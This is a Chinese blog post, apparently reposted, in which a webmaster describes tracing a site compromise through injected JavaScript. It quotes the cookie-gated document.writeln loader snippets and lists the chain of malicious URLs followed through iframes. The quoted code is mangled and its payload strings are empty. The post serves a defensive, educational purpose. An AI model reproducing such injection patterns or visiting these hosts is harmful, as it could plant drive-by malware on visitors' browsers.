欢迎来到福编程网,本站提供各种互联网专业知识!

浅谈站长如何排除网站挂马

发布时间:1970-01-01 作者:佚名 来源:互联网
昨晚深邃网友一诺小朋友向我报告说友情链接有一个网站有木马,我一看,晕,那个不是我正在帮朋友做关键词优化的QQ个性签名么?一开始以为只是杀软误报,加上我也没有装杀毒软件(一直没中过病毒),所以就没怎么管他?今天起来用新手机((*^__^*)嘻
昨晚深邃网友一诺小朋友向我报告说友情链接有一个网站有木马,我一看,晕,那个不是我正在帮朋友做关

键词优化的QQ个性签名么?一开始以为只是杀软误报,加上我也没有装杀毒软件(一直没中过病毒),所以就没怎么管他?

今天起来用新手机((*^__^*) 嘻嘻……,俺买了黑莓8100)打开百度搜索一下QQ个性签名,晕,排名不知道掉到第几页了。我就郁闷了,自己的SEO优化一直都是很温柔的上的啊,怎么会被降权了?于是就猜想可能真的被挂马了,因为是也算是刚认识的朋友,当然要帮忙处理一下这些琐碎的问题啦。回来之后,马上启用德国杀软小红伞,“滴滴”两声,打开QQ个性签名的时候报警了。于是打开html代码查看,既然没有iframe,这就奇怪了。于是清理缓存再次打开网页,根据小红伞提供的资料找到了报警的文件:info[1].js,打开得到下面的代码:

var az=document.cookie;

var za=az.indexOf(”qqqq”);

if(za!=-1){}else{var expires=new Date();expires.setTime(expires.getTime() 24*60*60*1000);

document.cookie=”qqqq=web;expires=” expires.toGMTString();

document.writeln(””);window.status=” “;}

我想问题应该出在js代码上,于是在代码搜索js,一个是51la的统计的js,另外一个是div.js,51la的自然可以排除,所以我就打开div.js,然后看到了下面“此地无银三百两”的网址代码(红色字体的),一路跟踪下去,果然发现可疑迹象。

// JavaScript Document

function showdiv(divnum,divbefor,id){

for(i=1;i<=divnum;i ){

try{

if(i==divbefor){

document.getElementById(id i).style.display=”inline”;

}else{

document.getElementById(id i).style.display=”none”;

}

}catch(e){ }

}

}

function menuFix(){}

document.writeln(””);

跟踪代码:http://xishiyi.com/images/main/info.js

firefox直接输入,转换得到地址如下http://www.91q.org/templets/images/div.js打开代码如下:

var az=document.cookie;

var za=az.indexOf(”qqqq”);

if(za!=-1){}else{var expires=new Date();expires.setTime(expires.getTime() 24*60*60*1000);

document.cookie=”qqqq=web;expires=” expires.toGMTString();

document.writeln(””);window.status=” “;}

继续iframe跟踪:http://kkwwkkc.cn/10/zz.htm

打开代码如下:

继续iframe跟踪:http://kkwwkkc.cn/10/123.htm

打开得到如下王八代码:

鄙人才疏学浅,看不懂转化了的代码啥意思,不想去转换,知道被挂马就ok了,最后是跟朋友说让他去掉那个代码,清理缓存重新打开网页,ok,没问题了。

写这篇文章的用意在意告诉各位,要注意自己网站的安全,如果发现挂马,不要错过每一个细节,首先仔细检查html页面有没有调用其他莫名的网站的东西,然后仔细分析自己页面的js代码,iframe是黑客们最常用的手段。实例一篇,希望对各位有用。这是我第一次抓马,经过自己的分析既然抓到了,很开心,特此分享……

相关推荐